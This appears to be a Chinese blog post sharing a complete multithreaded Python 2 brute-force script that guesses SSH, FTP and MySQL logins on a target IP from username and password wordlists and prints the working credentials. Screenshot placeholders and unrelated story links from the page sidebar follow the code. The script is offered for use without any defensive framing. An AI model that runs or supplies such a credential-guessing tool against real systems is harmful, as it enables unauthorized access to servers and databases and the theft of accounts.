Python实现多线程弱口令爆破

脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-

'this script can bruter ftp/ssh/mysql'

__author__ = 'reber'

import Queue
import threading
import time
import logging
import socket
from optparse import OptionParser
import paramiko
from ftplib import FTP
import MySQLdb

#################公有类#################
class CommonFun(object):
    """docstring for CommonFun"""
    def __init__(self):
        super(CommonFun, self).__init__()

    def set_log(self,lname):
        logger = logging.getLogger(lname)
        logger.setLevel(logging.DEBUG)

        ch = logging.StreamHandler()
        ch.setLevel(logging.DEBUG)

        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)

        logger.addHandler(ch)

    def show_log(self, lname, msg):
        a = logging.getLogger(lname)
        a.debug(msg)

    def show_result(self, lname, rlist):
        if rlist:
            print "###################################################################"
            for x in rlist:
                self.show_log(lname,x)
        else:
            print "not found..."

#################SSH爆破模块#################
class SshBruter(CommonFun):
    """docstring for SshBruter"""
    def __init__(self, *args):
        super(SshBruter, self).__init__()
        (options,arg) = args
        self.host = options.host
        self.userfile = options.userfile
        self.passfile = options.passfile
        self.threadnum = options.threadnum
        self.timeout = options.timeout
        self.result = []
        self.set_log(self.host)
        self.qlist = Queue.Queue()
        self.is_exit = False
        print self.host,self.userfile,self.passfile,self.threadnum

    def get_queue(self):
        with open(self.userfile, 'r') as f:
            ulines = f.readlines()
        with open(self.passfile, 'r') as f:
            plines = f.readlines()

        for name in ulines:
            for pwd in plines:
                name = name.strip()
                pwd = pwd.strip()
                self.qlist.put(name + ':' + pwd)

    def thread(self):        
        while not self.qlist.empty():
            if not self.is_exit:
                name,pwd = self.qlist.get().split(':')
                try:
                    ssh = paramiko.SSHClient()
                    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                    ssh.connect(hostname=self.host,port=22,username=name,password=pwd,timeout=self.timeout)
                    time.sleep(0.05)
                    ssh.close()
                    s = "[OK] %s:%s" % (name,pwd)
                    self.show_log(self.host,s)
                    self.result.append(s)
                except socket.timeout:
                    self.show_log(self.host,"Timeout...")
                    self.qlist.put(name + ':' + pwd)
                    time.sleep(3)
                except Exception, e:
                    error = "[Error] %s:%s" % (name,pwd)
                    self.show_log(self.host,error)
                    pass
            else:
                break

    def run(self):
        self.get_queue()
        starttime = time.time()

        threads = []
        for x in xrange(1,self.threadnum+1):
            t = threading.Thread(target=self.thread)
            threads.append(t)
            t.setDaemon(True) #主线程完成后不管子线程有没有结束,直接退出
            t.start()

        try:
            while True:
                if self.qlist.empty():
                    break
                else:
                    time.sleep(1)
        except KeyboardInterrupt:
            self.is_exit = True
            print "Exit the program..."
        print "Waiting..."
        time.sleep(5)

        self.show_result(self.host,self.result)
        finishetime = time.time()
        print "Used time: %f" % (finishetime-starttime)

#################FTP爆破模块#################
class FtpBruter(CommonFun):
    """docstring for FtpBruter"""
    def __init__(self, *args):
        super(FtpBruter, self).__init__()
        (options,arg) = args
        self.host = options.host
        self.userfile = options.userfile
        self.passfile = options.passfile
        self.threadnum = options.threadnum
        self.timeout = options.timeout
        self.result = []
        self.set_log(self.host)
        self.qlist = Queue.Queue()
        print self.host,self.userfile,self.passfile,self.threadnum

    def get_queue(self):
        with open(self.userfile, 'r') as f:
            ulines = f.readlines()
        with open(self.passfile, 'r') as f:
            plines = f.readlines()

        for name in ulines:
            for pwd in plines:
                name = name.strip()
                pwd = pwd.strip()
                self.qlist.put(name + ':' + pwd)

    def thread(self):
        while not self.qlist.empty():
            name,pwd = self.qlist.get().split(':')
            try:
                ftp = FTP()
                ftp.connect(self.host, 21, self.timeout)
                ftp.login(name, pwd)
                time.sleep(0.05)
                ftp.quit()
                s = "[OK] %s:%s" % (name,pwd)
                self.show_log(self.host,s)
                self.result.append(s)
            except socket.timeout:
                self.show_log(self.host,"Timeout...")
                self.qlist.put(name + ':' + pwd)
                time.sleep(1)
            except Exception, e:
                error = "[Error] %s:%s" % (name,pwd)
                self.show_log(self.host,error)
                pass

    def run(self):
        self.get_queue()
        starttime = time.time()

        threads = []
        for x in xrange(1,self.threadnum+1):
            t = threading.Thread(target=self.thread)
            threads.append(t)
            t.setDaemon(True) #主线程完成后不管子线程有没有结束,直接退出
            t.start()

        try:
            while True:
                if self.qlist.empty():
                    break
                else:
                    time.sleep(1)
        except KeyboardInterrupt:
            self.is_exit = True
            print "Exit the program..."
        print "Waiting..."
        time.sleep(5)

        self.show_result(self.host,self.result)
        finishetime = time.time()
        print "Used time: %f" % (finishetime-starttime)

#################MySQL爆破模块#################
class MysqlBruter(CommonFun):
    """docstring for MysqlBruter"""
    def __init__(self, *args):
        super(MysqlBruter, self).__init__()
        (options,arg) = args
        self.host = options.host
        self.userfile = options.userfile
        self.passfile = options.passfile
        self.threadnum = options.threadnum
        self.timeout = options.timeout
        self.result = []
        self.set_log(self.host)
        self.qlist = Queue.Queue()
        print self.host,self.userfile,self.passfile,self.threadnum

    def get_queue(self):
        with open(self.userfile, 'r') as f:
            ulines = f.readlines()
        with open(self.passfile, 'r') as f:
            plines = f.readlines()

        for name in ulines:
            for pwd in plines:
                name = name.strip()
                pwd = pwd.strip()
                self.qlist.put(name + ':' + pwd)

    def thread(self):
        while not self.qlist.empty():
            name,pwd = self.qlist.get().split(':')
            try:
                conn = MySQLdb.connect(host=self.host, user=name, passwd=pwd, db='mysql', port=3306)
                if conn:
                    # time.sleep(0.05)
                    conn.close()
                s = "[OK] %s:%s" % (name,pwd)
                self.show_log(self.host,s)
                self.result.append(s)
            except socket.timeout:
                self.show_log(self.host,"Timeout")
                self.qlist.put(name + ':' + pwd)
                time.sleep(3)
            except Exception, e:
                error = "[Error] %s:%s" % (name,pwd)
                self.show_log(self.host,error)
                pass

    def run(self):
        self.get_queue()
        starttime = time.time()

        threads = []
        for x in xrange(1,self.threadnum+1):
            t = threading.Thread(target=self.thread)
            threads.append(t)
            t.setDaemon(True) #主线程完成后不管子线程有没有结束,直接退出
            t.start()

        try:
            while True:
                if self.qlist.empty():
                    break
                else:
                    time.sleep(1)
        except KeyboardInterrupt:
            self.is_exit = True
            print "Exit the program..."
        print "Waiting..."
        time.sleep(5)

        self.show_result(self.host,self.result)
        finishetime = time.time()
        print "Used time: %f" % (finishetime-starttime)

def main():
    parser = OptionParser(usage='Usage: python %prog [options] type')
    parser.add_option('-i','--host',dest='host',help='target ip')
    parser.add_option('-o','--timeout',type=int,dest='timeout',default=5,help='timeout')
    parser.add_option('-t','--thread',type=int,dest='threadnum',default=10,help='threadnum')
    parser.add_option('-L','--userfile',dest='userfile',default='username.txt',help='userfile')
    parser.add_option('-P','--passfile',dest='passfile',default='password.txt',help='passfile')

    (options, args) = parser.parse_args()

    if not args:
        parser.print_help()
        exit()

    if args[0]=='ssh':
        if options.host:
            ssh = SshBruter(options, args)
            ssh.run()
        else:
            parser.print_help()
    elif args[0]=='ftp':
        if options.host:
            ftp = FtpBruter(options, args)
            ftp.run()
        else:
            parser.print_help()
    elif args[0]=='mysql':
        if options.host:
            mysql = MysqlBruter(options, args)
            mysql.run()
        else:
            parser.print_help()
    else:
        print "type must be ssh or ftp or mysql"

if __name__ == '__main__':
    main()

尝试爆破

bruter_help.png

bruter_ssh.png

bruter_ftp.png

bruter_mysql.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,186评论 6 492
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,858评论 3 387
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,620评论 0 348
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,888评论 1 285
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,009评论 6 385
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,149评论 1 291
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,204评论 3 412
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,956评论 0 268
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,385评论 1 303
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,698评论 2 327
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,863评论 1 341
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,544评论 4 335
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,185评论 3 317
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,899评论 0 21
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,141评论 1 267
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,684评论 2 362
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,750评论 2 351

推荐阅读更多精彩内容